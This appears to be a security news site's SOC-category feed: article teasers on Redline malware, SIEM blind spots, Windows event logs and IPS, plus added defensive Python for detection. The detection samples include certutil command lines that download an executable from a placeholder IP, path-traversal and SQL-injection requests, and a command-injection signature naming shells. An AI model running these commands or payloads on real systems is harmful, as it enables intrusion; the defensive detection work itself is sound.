SOC Archives - GBHackers Security | #1 Globally Trusted Cyber Security News Platform
https://gbhackers.com/category/soc/
GBHackers offers exclusive cyber security news coverage, new research papers and technology updates. Feed last built Fri, 04 Oct 2024 06:49:52 +0000.

Redline Malware Using Lua Bytecode to Challenge the SOC/TI Team to Detect
https://gbhackers.com/redline-malware/ | Tue, 30 Apr 2024 15:12:29 +0000
McAfee has discovered a new variant of the Redline Stealer malware that uses Lua bytecode to obfuscate its malicious code; this is the first instance of Redline using such a method. The malware was found on a legitimate Microsoft repository (vcpkg), disguised within a zip file named "Cheat.Lab.2.7.2.zip" that contained an MSI installer which deployed two executables […]

The post Redline Malware Using Lua Bytecode to Challenge the SOC/TI Team to Detect appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

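Hunting for this technique on disk, as an added example that is not part of the article or of McAfee's analysis: the script below scans a zip archive held in memory (recursing into nested zips) for precompiled Lua chunk headers, which begin with ESC "Lua" followed by a version byte (0x51 to 0x54 for Lua 5.1 to 5.4) and a format byte of 0x00. The archive contents, member names and offsets are constructed for the demonstration and are not indicators from the article; an MSI such as the one described would first have to be unpacked (for example with 7-Zip or msiextract), which this example does not do.

```python
"""Flag embedded Lua bytecode inside (possibly nested) zip archives.

Added example for triage of Lua-bytecode loaders; not McAfee's code.
"""
import io
import re
import zipfile

# Lua precompiled chunks begin with ESC "Lua" and a version byte (0x51..0x54 for
# Lua 5.1..5.4) followed by a format byte that is 0x00 for the official format.
LUA_HEADER = re.compile(rb"\x1bLua([\x51-\x54])\x00")
# Lua 5.3 and 5.4 additionally carry these check bytes right after the format byte.
LUAC_DATA = b"\x19\x93\r\n\x1a\n"


def find_lua_bytecode(blob: bytes) -> list:
    """Return (offset, lua_version) for every chunk header found anywhere in blob."""
    hits = []
    for m in LUA_HEADER.finditer(blob):
        version_byte = m.group(1)[0]
        version = f"{version_byte >> 4}.{version_byte & 0x0F}"
        hits.append((m.start(), version))
    return hits


def scan_zip(data: bytes, prefix: str = "") -> list:
    """Walk every member of a zip held in memory; recurse into nested zips."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            member = zf.read(info)
            name = prefix + info.filename
            if member.startswith(b"PK\x03\x04"):  # nested archive: descend into it
                findings.extend(scan_zip(member, name + "/"))
                continue
            for offset, version in find_lua_bytecode(member):
                findings.append((name, offset, version))
    return findings


def build_sample_archive() -> bytes:
    """Constructed test data: a benign text file, a blob with a Lua 5.4 header
    buried at offset 64, and a nested zip holding a Lua 5.1 header."""
    lua54 = b"\x1bLua\x54\x00" + LUAC_DATA + b"\x04\x08\x08"  # header plus a few body bytes
    lua51 = b"\x1bLua\x51\x00\x01\x04\x08\x04\x08\x00"
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr("lib/script.luac", lua51)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("readme.txt", b"nothing to see here")
        zf.writestr("resource.bin", b"\x00" * 64 + lua54)
        zf.writestr("nested.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for name, offset, version in scan_zip(build_sample_archive()):
        print(f"{name}: Lua {version} bytecode at offset {offset}")
```

Header scanning only catches chunks stored in the clear. Bytecode that is encrypted, XOR-masked or assembled at runtime from string fragments will not carry the magic on disk, and for that case the practical check is dynamic: hook or break on the embedded interpreter's loader (luaL_loadbuffer and friends) and dump what it is handed.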
AMIDES – Open-source Detection System to Uncover SIEM Blind Points
https://gbhackers.com/amides-open-source-detection-system/ | Mon, 20 Nov 2023 11:35:56 +0000
Cyberattacks pose a significant risk, and prevention alone is not enough, so timely detection is crucial. That is why most organizations use SIEM (Security Information and Event Management) systems to centrally collect and analyze security events, applying expert-written rules to detect intrusions. Organizations use these SIEM rulesets for intrusion detection, focusing on misuse patterns of known attacks. It's […]

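The blind point the title refers to, shown as an added example that is not part of the article or of the AMIDES project: a minimal evaluator for the subset of Sigma rule syntax used here (field modifiers contains, startswith, endswith, all and re, plus a condition that ANDs named selections) is run over three constructed Windows process-creation events. A rule that lists only the dash form of certutil's switches fires on the first event and misses the second, which uses the equally valid slash form; a hardened rule written with a regex catches both. Rule titles, events, the IP address and the paths are constructed for the demonstration.

```python
"""Minimal Sigma-style rule matcher showing an exact-pattern blind point.

Added example; not AMIDES code. Supports only the modifiers used below.
"""
import re


def _field_matches(value: str, modifiers: list, patterns) -> bool:
    """Apply Sigma-like modifiers to one field. String modifiers compare
    case-insensitively, as Sigma does; 're' uses the pattern as written."""
    if not isinstance(patterns, list):
        patterns = [patterns]
    if "re" in modifiers:
        tests = [re.search(str(p), value) is not None for p in patterns]
    else:
        v = value.lower()
        tests = []
        for p in patterns:
            p = str(p).lower()
            if "contains" in modifiers:
                tests.append(p in v)
            elif "startswith" in modifiers:
                tests.append(v.startswith(p))
            elif "endswith" in modifiers:
                tests.append(v.endswith(p))
            else:
                tests.append(v == p)
    # A list of values is OR-ed unless the 'all' modifier is present.
    return all(tests) if "all" in modifiers else any(tests)


def _selection_matches(selection: dict, event: dict) -> bool:
    """Every field in a selection map must match (Sigma map semantics)."""
    for key, patterns in selection.items():
        field, *modifiers = key.split("|")
        value = event.get(field)
        if value is None or not _field_matches(str(value), modifiers, patterns):
            return False
    return True


def rule_matches(rule: dict, event: dict) -> bool:
    """Condition support is limited to 'sel' or 'sel1 and sel2 ...'."""
    detection = rule["detection"]
    names = [n.strip() for n in detection["condition"].split(" and ")]
    return all(_selection_matches(detection[n], event) for n in names)


def run_rules(rules: list, events: list) -> list:
    """Return, per event, the titles of the rules that fired."""
    return [[r["title"] for r in rules if rule_matches(r, e)] for e in events]


# Constructed rules. The narrow one mirrors the common habit of writing only the
# dash form of a switch; certutil also accepts the slash form.
NARROW_RULE = {
    "title": "Certutil download (narrow)",
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains|all": ["-urlcache", "-split", "-f"],
        },
        "condition": "selection",
    },
}
HARDENED_RULE = {
    "title": "Certutil download (hardened)",
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|re": r"(?i)[-/]urlcache.*[-/]split.*[-/]f\b",
        },
        "condition": "selection",
    },
}

# Constructed process-creation events (Sysmon EventID 1 / Security 4688 style fields).
EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.7/p.exe C:\Users\Public\p.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe /urlcache /split /f http://198.51.100.7/p.exe C:\Users\Public\p.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe report.txt"},
]

if __name__ == "__main__":
    for event, fired in zip(EVENTS, run_rules([NARROW_RULE, HARDENED_RULE], EVENTS)):
        print(f"{event['CommandLine'][:40]:<40} -> {fired or 'no match'}")
```

The second event is the blind point: the attacker changed nothing about what certutil does, only the spelling of its switches, and the literal rule no longer sees it. Every such variant an analyst has to anticipate by hand is one more reason to look at approaches, like the one the article covers, that do not rely on exact pattern matches alone.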
IBM Unveils Cloud-Native QRadar SIEM to Maximize Power of SOC Professionals
https://gbhackers.com/ibm-cloud-native-qradar-siem/ | Sat, 11 Nov 2023 11:49:47 +0000
IBM has announced the launch of its cloud-native QRadar SIEM, designed to improve the scale, speed and flexibility of security teams. With this offering, organizations gain improved threat detection and response capabilities to better protect their digital assets and stay ahead of potential cyber-attacks. IBM Security helps […]

SOC Fourth Defense Phase – Cyber Threat Intelligence Guide
https://gbhackers.com/cyber-threat-intelligence-benefits/ | Mon, 10 Jul 2023 10:00:24 +0000
Cyber threat intelligence is one of the most critical concerns in an evolving threat environment of rapid zero-day attacks, cyber-criminality and espionage. Traditional approaches remain important to maintain, but on their own they are not sufficient to address the risk to individual organizations adequately. Threat actors are constantly inventing new tools and techniques to […]

Most Enterprise SIEMs Fail Against MITRE ATT&CK Tactics
https://gbhackers.com/enterprise-siems-fail/ | Wed, 28 Jun 2023 13:58:16 +0000
SIEM (Security Information and Event Management) tools are used in most organizations to monitor and analyze security events and to detect threat actors. Organizations keep building out their security programs to protect against ransomware, data breaches and many other types of cybercriminal activity. However, security is a continuous process. These SIEM tools […]

SOC First Defense – Understanding The Cyber Attack Chain – A Defense with/without SOC
https://gbhackers.com/soc-defense-attack-chain/ | Mon, 26 Jun 2023 10:51:52 +0000
This article will help you understand modern cyber threats from the SOC's perspective and the attack surfaces most commonly used in malware and cyber-attacks. Most cyber-attacks are executed in stages, so the SOC team must understand the attack patterns and the attack chain. So breaking the attack chain and averting the criminal's intent to stop their […]

Diving Deeper Into Windows Event logs for Security Operation Center (SOC) – Guide
https://gbhackers.com/event-logs-cyber-security-operations-center/ | Tue, 20 Jun 2023 05:54:00 +0000
A cyber security operations center protects the organization and the sensitive business data of its customers. It provides active monitoring of the business's valuable assets, with visibility, alerting and investigation of threats, and a holistic approach to managing risk. The analytics service can be run in-house or as a managed security service. Collecting event logs and analyzing them with real-world […]

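As an added example that is not part of the article: the code below parses Security log records in the Windows Event XML schema (System/EventID, System/TimeCreated and the EventData fields TargetUserName, IpAddress, LogonType, Status) and correlates a burst of failed logons (event 4625) with a subsequent successful network logon (event 4624 with LogonType 3) from the same source address, the kind of stateful analysis that a single stateless rule cannot express. The records, account names, addresses, threshold and window are constructed for the demonstration.

```python
"""Correlate Windows Security events 4625 -> 4624 per source address.

Added example for log analysis; not code from the article. Event XML is
constructed in the Windows Event schema with only the fields needed here.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def parse_event(xml_text: str) -> dict:
    """Flatten one <Event>: System/EventID, System/TimeCreated and every EventData/Data."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    when = system.find("e:TimeCreated", NS).get("SystemTime").replace("Z", "+00:00")
    event = {
        "EventID": int(system.find("e:EventID", NS).text),
        "Time": datetime.fromisoformat(when),
    }
    for data in root.find("e:EventData", NS).findall("e:Data", NS):
        event[data.get("Name")] = data.text
    return event


def detect_bruteforce(events: list, threshold: int = 5,
                      window: timedelta = timedelta(seconds=60)) -> list:
    """Sliding-window count of 4625 per IpAddress. Crossing the threshold raises
    one 'attempt' alert per address; a 4624 network logon from that address
    within the window of its last failure is reported as a successful brute force."""
    alerts = []
    failures = defaultdict(deque)  # IpAddress -> timestamps of recent 4625s
    alerted = set()
    for ev in sorted(events, key=lambda e: e["Time"]):
        ip = ev.get("IpAddress")
        if ev["EventID"] == 4625:
            recent = failures[ip]
            recent.append(ev["Time"])
            while recent and ev["Time"] - recent[0] > window:
                recent.popleft()
            if len(recent) >= threshold and ip not in alerted:
                alerted.add(ip)
                alerts.append(("bruteforce_attempt", ip, ev["Time"]))
        elif ev["EventID"] == 4624 and ev.get("LogonType") == "3":
            recent = failures.get(ip)
            if recent and len(recent) >= threshold and ev["Time"] - recent[-1] <= window:
                alerts.append(("bruteforce_success", ip, ev["Time"], ev.get("TargetUserName")))
    return alerts


def make_event(event_id: int, when: datetime, **data) -> str:
    """Constructed record in the Windows Event XML schema (same shape as EventLogRecord.ToXml())."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    stamp = when.strftime("%Y-%m-%dT%H:%M:%SZ")
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'<TimeCreated SystemTime="{stamp}"/></System>'
            f'<EventData>{fields}</EventData></Event>')


def sample_events() -> list:
    """Six failures from one address at 10 s intervals, a success 15 s after the
    last failure, and one unrelated failure from another address as noise."""
    t0 = datetime(2024, 6, 20, 5, 54, 0, tzinfo=timezone.utc)
    records = [
        make_event(4625, t0 + timedelta(seconds=10 * i), TargetUserName="administrator",
                   IpAddress="198.51.100.23", LogonType=3, Status="0xC000006D")
        for i in range(6)
    ]
    records.append(make_event(4624, t0 + timedelta(seconds=65), TargetUserName="administrator",
                              IpAddress="198.51.100.23", LogonType=3))
    records.append(make_event(4625, t0 + timedelta(seconds=30), TargetUserName="jdoe",
                              IpAddress="203.0.113.9", LogonType=3, Status="0xC000006D"))
    return [parse_event(r) for r in records]


if __name__ == "__main__":
    for alert in detect_bruteforce(sample_events()):
        print(alert)
```

Real records exported with Get-WinEvent and each record's ToXml() method have exactly this shape, so parse_event applies to them unchanged; the noise address never reaches the threshold and produces nothing, which is the point of counting per source rather than globally.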
Modern CyberSOC – A Brief Implementation Of Building a Cyber Security Infrastructure
https://gbhackers.com/modern-cybersoc/ | Sat, 10 Jun 2023 06:30:00 +0000
In earlier years everyone depended on the CyberSOC (firewalls, WAF, SIEM and the like); the priority in building the SOC was to provide security, and confidentiality, integrity and availability (the CIA triad) were maintained. Later, as attacks and threat actors grew more challenging, the existing SOC could no longer provide adequate protection of the CIA properties. […]

Intrusion Prevention System (IPS) In-depth Analysis – A Detailed Guide
https://gbhackers.com/intrusion-prevention-system-architecture/ | Wed, 07 Jun 2023 08:02:18 +0000
Like an intrusion detection system (IDS), an intrusion prevention system (IPS) inspects network traffic. In this article we take a deep dive into IPS architecture. An IPS is a framework that monitors a network for malicious activity such as security threats or policy violations and, unlike a passive IDS, sits inline so that it can block the offending traffic rather than only report it. Vulnerability exploits normally come in the form of malicious […]

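To make the difference between inspecting and preventing concrete, here is an added example that is not part of the article: an inline inspector for a single HTTP request line that normalizes the request target (repeated percent-decoding, backslash-to-slash folding, lowercasing) before matching three signatures, and returns pass, alert (IDS mode) or drop (IPS mode). The signatures, sample requests and the decode_rounds setting are constructed for the demonstration; a real IPS works on reassembled TCP streams and full protocol parsers, not on one line at a time.

```python
"""Inline request inspection with normalization before signature matching.

Added example; not code from the article. Handles one request line at a time.
"""
import re
from urllib.parse import unquote

# Constructed signatures, applied to the normalized (decoded, lowercased) target.
SIGNATURES = [
    ("path-traversal", re.compile(r"(?:^|/)\.\.(?:/|$)")),
    ("sqli-tautology", re.compile(r"'\s*or\s+'?1'?\s*=\s*'?1")),
    ("cmd-injection", re.compile(r"[;&|`]\s*(?:cat|sh|bash|cmd(?:\.exe)?|powershell)\b")),
]


def normalize(target: str, decode_rounds: int = 2) -> str:
    """Percent-decode up to decode_rounds times (double encoding is a classic
    evasion), fold backslashes to slashes and lowercase. The bound keeps a
    hostile client from making the inspector loop on deeply nested encodings."""
    text = target
    for _ in range(decode_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text.replace("\\", "/").lower()


def inspect_request(request_line: str, mode: str = "ips", decode_rounds: int = 2) -> tuple:
    """Return (verdict, hits). IDS mode only alerts; IPS mode drops the request."""
    block = "drop" if mode == "ips" else "alert"
    parts = request_line.split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return (block, ["malformed-request-line"])
    target = normalize(parts[1], decode_rounds)
    hits = [name for name, pattern in SIGNATURES if pattern.search(target)]
    return (block, hits) if hits else ("pass", [])


# Constructed traffic: benign, single-encoded traversal, double-encoded traversal, SQLi.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.1",
    "GET /static/..%2f..%2fetc/passwd HTTP/1.1",
    "GET /static/%252e%252e/%252e%252e/etc/passwd HTTP/1.1",
    "GET /login?user=admin'%20OR%20'1'%3D'1 HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(f"{line:<55} {inspect_request(line)}")
        # A single decode round is the weak setting: it misses the double-encoded traversal.
        print(f"{'':<55} one round: {inspect_request(line, decode_rounds=1)}")
```

The third request is the one to watch: with decode_rounds=1 the target still reads %2e%2e after decoding and passes every signature, while the default of two rounds exposes the ../ and the request is dropped. Matching raw bytes without normalizing first is the most common way an inline device ends up with a false sense of coverage.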
SOC Analyst Training – Cyber Attack Intrusion Analysis With SIEM Tools – 2023
https://gbhackers.com/soc-training-from-scratch/ | Fri, 28 Apr 2023 15:16:08 +0000
SOC training is one of the most critical concerns in building a quality Security Operations Center team to fight the advanced threats that target the organization's network. Since cyber attacks are rising daily, security experts must implement sophisticated detection and prevention technologies, so implementing a dedicated SOC operation and SOC analyst team who […]
